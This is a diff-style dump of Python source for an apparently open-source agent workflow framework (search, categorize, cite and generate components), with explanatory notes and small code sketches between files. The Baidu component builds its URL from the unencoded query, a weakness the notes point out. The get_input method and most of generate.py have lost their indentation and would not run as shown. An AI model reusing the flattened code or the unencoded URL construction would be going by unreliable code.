# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
import requests
import re
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class BaiduParam(ComponentParamBase):
    """
    Define the Baidu component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class Baidu(ComponentBase, ABC):
    component_name = "Baidu"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Baidu.be_output("")

        try:
            url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
            response = requests.get(url=url, headers=headers)

            url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
            title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
            body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
            baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)} for
                         url, title, body in zip(url_res, title_res, body_res)]
            del body_res, url_res, title_res
        except Exception as e:
            return Baidu.be_output("**ERROR**: " + str(e))

        if not baidu_res:
            return Baidu.be_output("")

        df = pd.DataFrame(baidu_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df
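
The Baidu component builds its request URL by concatenating the raw query text, so a query containing `&`, `#` or spaces can change the meaning of the URL. One possible hardening, sketched here with the standard library only, is to percent-encode the parameters; the helper name `build_search_url` is an assumption and not part of the component.

```python
from urllib.parse import urlencode


def build_search_url(query, top_n=10):
    """Build a Baidu search URL with the query percent-encoded."""
    return "https://www.baidu.com/s?" + urlencode({"wd": query, "rn": top_n})


url = build_search_url("a b&c", 5)
```

Passing the same dictionary as `params=` to `requests.get` would have a similar effect, since `requests` encodes query parameters itself.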

494
agent/component/base.py Normal file

@ -0,0 +1,494 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import builtins
import json
import os
from copy import deepcopy
from functools import partial
from typing import List, Dict, Tuple, Union
import pandas as pd
from agent import settings
from agent.settings import flow_logger, DEBUG
_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
_DEPRECATED_PARAMS = "_deprecated_params"
_USER_FEEDED_PARAMS = "_user_feeded_params"
_IS_RAW_CONF = "_is_raw_conf"


class ComponentParamBase(ABC):
    def __init__(self):
        self.output_var_name = "output"
        self.message_history_window_size = 22

    def set_name(self, name: str):
        self._name = name
        return self

    def check(self):
        raise NotImplementedError("Parameter Object should be checked.")

    @classmethod
    def _get_or_init_deprecated_params_set(cls):
        if not hasattr(cls, _DEPRECATED_PARAMS):
            setattr(cls, _DEPRECATED_PARAMS, set())
        return getattr(cls, _DEPRECATED_PARAMS)

    def _get_or_init_feeded_deprecated_params_set(self, conf=None):
        if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
            if conf is None:
                setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
            else:
                setattr(
                    self,
                    _FEEDED_DEPRECATED_PARAMS,
                    set(conf[_FEEDED_DEPRECATED_PARAMS]),
                )
        return getattr(self, _FEEDED_DEPRECATED_PARAMS)

    def _get_or_init_user_feeded_params_set(self, conf=None):
        if not hasattr(self, _USER_FEEDED_PARAMS):
            if conf is None:
                setattr(self, _USER_FEEDED_PARAMS, set())
            else:
                setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
        return getattr(self, _USER_FEEDED_PARAMS)

    def get_user_feeded(self):
        return self._get_or_init_user_feeded_params_set()

    def get_feeded_deprecated_params(self):
        return self._get_or_init_feeded_deprecated_params_set()

    @property
    def _deprecated_params_set(self):
        return {name: True for name in self.get_feeded_deprecated_params()}

    def __str__(self):
        return json.dumps(self.as_dict(), ensure_ascii=False)

    def as_dict(self):
        def _recursive_convert_obj_to_dict(obj):
            ret_dict = {}
            for attr_name in list(obj.__dict__):
                if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
                    continue
                # get attr
                attr = getattr(obj, attr_name)
                if isinstance(attr, pd.DataFrame):
                    ret_dict[attr_name] = attr.to_dict()
                    continue
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
                else:
                    ret_dict[attr_name] = attr

            return ret_dict

        return _recursive_convert_obj_to_dict(self)

    def update(self, conf, allow_redundant=False):
        update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
        if update_from_raw_conf:
            deprecated_params_set = self._get_or_init_deprecated_params_set()
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set()
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set()
            setattr(self, _IS_RAW_CONF, False)
        else:
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set(conf)
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)

        def _recursive_update_param(param, config, depth, prefix):
            if depth > settings.PARAM_MAXDEPTH:
                raise ValueError("Param define nesting too deep!!!, can not parse it")

            inst_variables = param.__dict__
            redundant_attrs = []
            for config_key, config_value in config.items():
                # redundant attr
                if config_key not in inst_variables:
                    if not update_from_raw_conf and config_key.startswith("_"):
                        setattr(param, config_key, config_value)
                    else:
                        setattr(param, config_key, config_value)
                        # redundant_attrs.append(config_key)
                    continue

                full_config_key = f"{prefix}{config_key}"

                if update_from_raw_conf:
                    # add user feeded params
                    user_feeded_params_set.add(full_config_key)

                    # update user feeded deprecated param set
                    if full_config_key in deprecated_params_set:
                        feeded_deprecated_params_set.add(full_config_key)

                # supported attr
                attr = getattr(param, config_key)
                if type(attr).__name__ in dir(builtins) or attr is None:
                    setattr(param, config_key, config_value)

                else:
                    # recursive set obj attr
                    sub_params = _recursive_update_param(
                        attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
                    )
                    setattr(param, config_key, sub_params)

            if not allow_redundant and redundant_attrs:
                raise ValueError(
                    f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
                )

            return param

        return _recursive_update_param(param=self, config=conf, depth=0, prefix="")

    def extract_not_builtin(self):
        def _get_not_builtin_types(obj):
            ret_dict = {}
            for variable in obj.__dict__:
                attr = getattr(obj, variable)
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[variable] = _get_not_builtin_types(attr)

            return ret_dict

        return _get_not_builtin_types(self)

    def validate(self):
        self.builtin_types = dir(builtins)
        self.func = {
            "ge": self._greater_equal_than,
            "le": self._less_equal_than,
            "in": self._in,
            "not_in": self._not_in,
            "range": self._range,
        }
        home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
        param_validation_path_prefix = home_dir + "/param_validation/"

        param_name = type(self).__name__
        param_validation_path = "/".join(
            [param_validation_path_prefix, param_name + ".json"]
        )

        validation_json = None

        try:
            with open(param_validation_path, "r") as fin:
                validation_json = json.loads(fin.read())
        except BaseException:
            return

        self._validate_param(self, validation_json)

    def _validate_param(self, param_obj, validation_json):
        default_section = type(param_obj).__name__
        var_list = param_obj.__dict__

        for variable in var_list:
            attr = getattr(param_obj, variable)

            if type(attr).__name__ in self.builtin_types or attr is None:
                if variable not in validation_json:
                    continue

                validation_dict = validation_json[default_section][variable]
                value = getattr(param_obj, variable)
                value_legal = False

                for op_type in validation_dict:
                    if self.func[op_type](value, validation_dict[op_type]):
                        value_legal = True
                        break

                if not value_legal:
                    raise ValueError(
                        "Please check runtime conf, {} = {} does not match user-parameter restriction".format(
                            variable, value
                        )
                    )

            elif variable in validation_json:
                self._validate_param(attr, validation_json)

    @staticmethod
    def check_string(param, descr):
        if type(param).__name__ not in ["str"]:
            raise ValueError(
                descr + " {} not supported, should be string type".format(param)
            )

    @staticmethod
    def check_empty(param, descr):
        if not param:
            raise ValueError(
                descr + " does not support empty value."
            )

    @staticmethod
    def check_positive_integer(param, descr):
        if type(param).__name__ not in ["int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )

    @staticmethod
    def check_positive_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive numeric".format(param)
            )

    @staticmethod
    def check_nonnegative_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param < 0:
            raise ValueError(
                descr
                + " {} not supported, should be non-negative numeric".format(param)
            )

    @staticmethod
    def check_decimal_float(param, descr):
        if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
            raise ValueError(
                descr
                + " {} not supported, should be a float number in range [0, 1]".format(
                    param
                )
            )

    @staticmethod
    def check_boolean(param, descr):
        if type(param).__name__ != "bool":
            raise ValueError(
                descr + " {} not supported, should be bool type".format(param)
            )

    @staticmethod
    def check_open_unit_interval(param, descr):
        if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
            raise ValueError(
                descr + " should be a numeric number between 0 and 1 exclusively"
            )

    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr
                + " {} is not supported, it should be in {}".format(param, valid_values)
            )

    @staticmethod
    def check_defined_type(param, descr, types):
        if type(param).__name__ not in types:
            raise ValueError(
                descr + " {} not supported, should be one of {}".format(param, types)
            )

    @staticmethod
    def check_and_change_lower(param, valid_list, descr=""):
        if type(param).__name__ != "str":
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

        lower_param = param.lower()
        if lower_param in valid_list:
            return lower_param
        else:
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

    @staticmethod
    def _greater_equal_than(value, limit):
        return value >= limit - settings.FLOAT_ZERO

    @staticmethod
    def _less_equal_than(value, limit):
        return value <= limit + settings.FLOAT_ZERO

    @staticmethod
    def _range(value, ranges):
        in_range = False
        for left_limit, right_limit in ranges:
            if (
                    left_limit - settings.FLOAT_ZERO
                    <= value
                    <= right_limit + settings.FLOAT_ZERO
            ):
                in_range = True
                break

        return in_range

    @staticmethod
    def _in(value, right_value_list):
        return value in right_value_list

    @staticmethod
    def _not_in(value, wrong_value_list):
        return value not in wrong_value_list

    def _warn_deprecated_param(self, param_name, descr):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} is deprecated and ignored in this version."
            )

    def _warn_to_deprecate_param(self, param_name, descr, new_param):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} will be deprecated in future release; "
                f"please use {new_param} instead."
            )
            return True
        return False


class ComponentBase(ABC):
    component_name: str

    def __str__(self):
        """
        {
            "component_name": "Begin",
            "params": {}
        }
        """
        return """{{
            "component_name": "{}",
            "params": {}
        }}""".format(self.component_name,
                     self._param
                     )

    def __init__(self, canvas, id, param: ComponentParamBase):
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()

    def run(self, history, **kwargs):
        flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
                                                              json.dumps(kwargs, ensure_ascii=False)))
        try:
            res = self._run(history, **kwargs)
            self.set_output(res)
        except Exception as e:
            self.set_output(pd.DataFrame([{"content": str(e)}]))
            raise e

        return res

    def _run(self, history, **kwargs):
        raise NotImplementedError()

    def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
        o = getattr(self._param, self._param.output_var_name)
        # Normalize anything that is neither a stream nor a DataFrame.
        if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
            if not isinstance(o, list): o = [o]
            o = pd.DataFrame(o)

        if allow_partial or not isinstance(o, partial):
            return self._param.output_var_name, o

        # Drain the stream and keep only its last item.
        outs = None
        for oo in o():
            if not isinstance(oo, pd.DataFrame):
                outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
            else: outs = oo
        return self._param.output_var_name, outs

    def reset(self):
        setattr(self._param, self._param.output_var_name, None)

    def set_output(self, v: pd.DataFrame):
        setattr(self._param, self._param.output_var_name, v)
def get_input(self):
upstream_outs = []
reversed_cpnts = []
if len(self._canvas.path) > 1:
reversed_cpnts.extend(self._canvas.path[-2])
reversed_cpnts.extend(self._canvas.path[-1])
if DEBUG: print(self.component_name, reversed_cpnts[::-1])
for u in reversed_cpnts[::-1]:
if self.get_component_name(u) in ["switch"]: continue
if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
if o is not None:
upstream_outs.append(o)
continue
if u not in self._canvas.get_component(self._id)["upstream"]: continue
if self.component_name.lower().find("switch") < 0 \
and self.get_component_name(u) in ["relevant", "categorize"]:
continue
if u.lower().find("answer") >= 0:
for r, c in self._canvas.history[::-1]:
if r == "user":
upstream_outs.append(pd.DataFrame([{"content": c}]))
break
break
if self.component_name.lower().find("answer") >= 0:
if self.get_component_name(u) in ["relevant"]:
continue
else:
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
if o is not None:
upstream_outs.append(o)
break
if upstream_outs:
df = pd.concat(upstream_outs, ignore_index=True)
if "content" in df:
df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
return df
return pd.DataFrame()

    def get_stream_input(self):
        reversed_cpnts = []
        if len(self._canvas.path) > 1:
            reversed_cpnts.extend(self._canvas.path[-2])
        reversed_cpnts.extend(self._canvas.path[-1])

        for u in reversed_cpnts[::-1]:
            if self.get_component_name(u) in ["switch", "answer"]: continue
            return self._canvas.get_component(u)["obj"].output()[1]

    @staticmethod
    def be_output(v):
        return pd.DataFrame([{"content": v}])

    def get_component_name(self, cpn_id):
        return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
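
Each component's parameter class inherits the `check_*` helpers from `ComponentParamBase` and calls them from its own `check()`, which `ComponentBase.__init__` invokes on construction. The sketch below reproduces two of those helpers in a hypothetical standalone class, `TopNParam`, to show how a misconfigured value is rejected before the component runs; the `"long"` type name is dropped because it does not exist in Python 3.

```python
class TopNParam:
    """Hypothetical parameter object using two of the check helpers."""

    def __init__(self, top_n=10, channel="text"):
        self.top_n = top_n
        self.channel = channel

    @staticmethod
    def check_positive_integer(param, descr):
        # Comparing the type name rejects bool, which isinstance(x, int) accepts.
        if type(param).__name__ != "int" or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )

    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr + " {} is not supported, it should be in {}".format(param, valid_values)
            )

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Channel", ["text", "news"])


def is_valid(param):
    """Return True when check() passes, False when it raises ValueError."""
    try:
        param.check()
    except ValueError:
        return False
    return True
```

Checking `type(param).__name__` rather than using `isinstance` is stricter: subclasses of `int` such as `bool` are refused.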

48
agent/component/begin.py Normal file

@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from functools import partial
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase


class BeginParam(ComponentParamBase):
    """
    Define the Begin component parameters.
    """

    def __init__(self):
        super().__init__()
        self.prologue = "Hi! I'm your smart assistant. What can I do for you?"

    def check(self):
        return True


class Begin(ComponentBase):
    component_name = "Begin"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)
        return pd.DataFrame([{"content": self._param.prologue}])

    def stream_output(self):
        res = {"content": self._param.prologue}
        yield res
        self.set_output(res)

85
agent/component/bing.py Normal file

@ -0,0 +1,85 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import requests
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class BingParam(ComponentParamBase):
    """
    Define the Bing component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.channel = "Webpages"
        self.api_key = "YOUR_ACCESS_KEY"
        self.country = "CN"
        self.language = "en"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
        self.check_empty(self.api_key, "Bing subscription key")
        self.check_valid_value(self.country, "Bing Country",
                               ['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
                                'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
                                'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
        self.check_valid_value(self.language, "Bing Languages",
                               ['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
                                'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
                                'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
                                'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])


class Bing(ComponentBase, ABC):
    component_name = "Bing"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Bing.be_output("")

        try:
            headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
            params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
                      "answerCount": 1, "promote": self._param.channel}
            if self._param.channel == "Webpages":
                response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
                response.raise_for_status()
                search_results = response.json()
                bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
                            search_results["webPages"]["value"]]
            elif self._param.channel == "News":
                response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
                                        params=params)
                response.raise_for_status()
                search_results = response.json()
                bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
                            in search_results['news']['value']]
        except Exception as e:
            return Bing.be_output("**ERROR**: " + str(e))

        if not bing_res:
            return Bing.be_output("")

        df = pd.DataFrame(bing_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df


@ -0,0 +1,87 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG


class CategorizeParam(GenerateParam):
    """
    Define the Categorize component parameters.
    """

    def __init__(self):
        super().__init__()
        self.category_description = {}
        self.prompt = ""

    def check(self):
        super().check()
        self.check_empty(self.category_description, "[Categorize] Category examples")
        for k, v in self.category_description.items():
            if not k: raise ValueError("[Categorize] Category name can not be empty!")
            if not v.get("to"): raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")

    def get_prompt(self):
        # One "Question ... Category ..." line per example of each category.
        cate_lines = []
        for c, desc in self.category_description.items():
            for l in desc.get("examples", "").split("\n"):
                if not l: continue
                cate_lines.append("Question: {}\tCategory: {}".format(l, c))
        descriptions = []
        for c, desc in self.category_description.items():
            if desc.get("description"):
                descriptions.append(
                    "--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))

        self.prompt = """
        You're a text classifier. You need to categorize the user's questions into {} categories,
        namely: {}
        Here's the description of each category:
        {}

        You could learn from the following examples:
        {}
        You could learn from the above examples.
        Just mention the category names, no need for any additional words.
        """.format(
            len(self.category_description.keys()),
            "/".join(list(self.category_description.keys())),
            "\n".join(descriptions),
            "- ".join(cate_lines)
        )
        return self.prompt


class Categorize(Generate, ABC):
    component_name = "Categorize"

    def _run(self, history, **kwargs):
        input = self.get_input()
        input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "\tCategory: "
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
                            self._param.gen_conf())
        if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::", input)
        for c in self._param.category_description.keys():
            if ans.lower().find(c.lower()) >= 0:
                return Categorize.be_output(self._param.category_description[c]["to"])

        # No category matched: fall back to the last configured category.
        # dict.items() is not subscriptable in Python 3, so materialize it first.
        return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
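
`Categorize._run` routes to the first category whose name appears in the model's reply and otherwise falls back to the last configured category. A minimal sketch of that routing step, without the LLM call, could look as follows; the function name `pick_route` and the component ids are hypothetical.

```python
def pick_route(answer, category_description):
    """Return the "to" target of the first category named in `answer`."""
    for name, desc in category_description.items():
        if answer.lower().find(name.lower()) >= 0:
            return desc["to"]
    # dict views are not subscriptable in Python 3; materialize them first.
    return list(category_description.items())[-1][1]["to"]


cats = {"Billing": {"to": "cpn_a"}, "Other": {"to": "cpn_b"}}
matched = pick_route("It is billing.", cats)
fallback = pick_route("no idea", cats)
```

The fallback relies on dictionaries preserving insertion order, which Python guarantees from version 3.7 on, so the catch-all category should be configured last.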

75
agent/component/cite.py Normal file

@ -0,0 +1,75 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase


class CiteParam(ComponentParamBase):
    """
    Define the Cite component parameters.
    """

    def __init__(self):
        super().__init__()
        self.cite_sources = []

    def check(self):
        self.check_empty(self.cite_sources, "Please specify where you want to cite from.")


class Cite(ComponentBase, ABC):
    component_name = "Cite"

    def _run(self, history, **kwargs):
        input = "\n- ".join(self.get_input()["content"])
        # get_component() returns a dict; the component instance is under "obj".
        sources = [self._canvas.get_component(cpn_id)["obj"].output()[1] for cpn_id in self._param.cite_sources]
        query = []
        for role, cnt in history[::-1][:self._param.message_history_window_size]:
            if role != "user": continue
            query.append(cnt)
        query = "\n".join(query)

        kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
        if not kbs:
            raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
                                        1, self._param.top_n,
                                        self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
                                        aggs=False, rerank_mdl=rerank_mdl)

        if not kbinfos["chunks"]: return pd.DataFrame()
        df = pd.DataFrame(kbinfos["chunks"])
        df["content"] = df["content_with_weight"]
        del df["content_with_weight"]
        return df


@ -0,0 +1,66 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from duckduckgo_search import DDGS
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class DuckDuckGoParam(ComponentParamBase):
    """
    Define the DuckDuckGo component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.channel = "text"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])


class DuckDuckGo(ComponentBase, ABC):
    component_name = "DuckDuckGo"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DuckDuckGo.be_output("")

        try:
            if self._param.channel == "text":
                with DDGS() as ddgs:
                    # {'title': '', 'href': '', 'body': ''}
                    duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
                                in ddgs.text(ans, max_results=self._param.top_n)]
            elif self._param.channel == "news":
                with DDGS() as ddgs:
                    # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
                    duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
                                in ddgs.news(ans, max_results=self._param.top_n)]
        except Exception as e:
            return DuckDuckGo.be_output("**ERROR**: " + str(e))

        if not duck_res:
            return DuckDuckGo.be_output("")

        df = pd.DataFrame(duck_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df

150
agent/component/generate.py Normal file

@ -0,0 +1,150 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from functools import partial
import pandas as pd
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase
class GenerateParam(ComponentParamBase):
"""
Define the Generate component parameters.
"""
def __init__(self):
super().__init__()
self.llm_id = ""
self.prompt = ""
self.max_tokens = 0
self.temperature = 0
self.top_p = 0
self.presence_penalty = 0
self.frequency_penalty = 0
self.cite = True
self.parameters = []
def check(self):
self.check_decimal_float(self.temperature, "[Generate] Temperature")
self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
self.check_decimal_float(self.top_p, "[Generate] Top P")
self.check_empty(self.llm_id, "[Generate] LLM")
# self.check_defined_type(self.parameters, "Parameters", ["list"])
def gen_conf(self):
conf = {}
if self.max_tokens > 0: conf["max_tokens"] = self.max_tokens
if self.temperature > 0: conf["temperature"] = self.temperature
if self.top_p > 0: conf["top_p"] = self.top_p
if self.presence_penalty > 0: conf["presence_penalty"] = self.presence_penalty
if self.frequency_penalty > 0: conf["frequency_penalty"] = self.frequency_penalty
return conf
class Generate(ComponentBase):
component_name = "Generate"
def get_dependent_components(self):
cpnts = [para["component_id"] for para in self._param.parameters]
return cpnts
def set_cite(self, retrieval_res, answer):
answer, idx = retrievaler.insert_citations(answer, [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
[ck["vector"] for _, ck in retrieval_res.iterrows()],
LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
self._canvas.get_embedding_model()), tkweight=0.7,
vtweight=0.3)
doc_ids = set([])
recall_docs = []
for i in idx:
did = retrieval_res.loc[int(i), "doc_id"]
if did in doc_ids: continue
doc_ids.add(did)
recall_docs.append({"doc_id": did, "doc_name": retrieval_res.loc[int(i), "docnm_kwd"]})
del retrieval_res["vector"]
del retrieval_res["content_ltks"]
reference = {
"chunks": [ck.to_dict() for _, ck in retrieval_res.iterrows()],
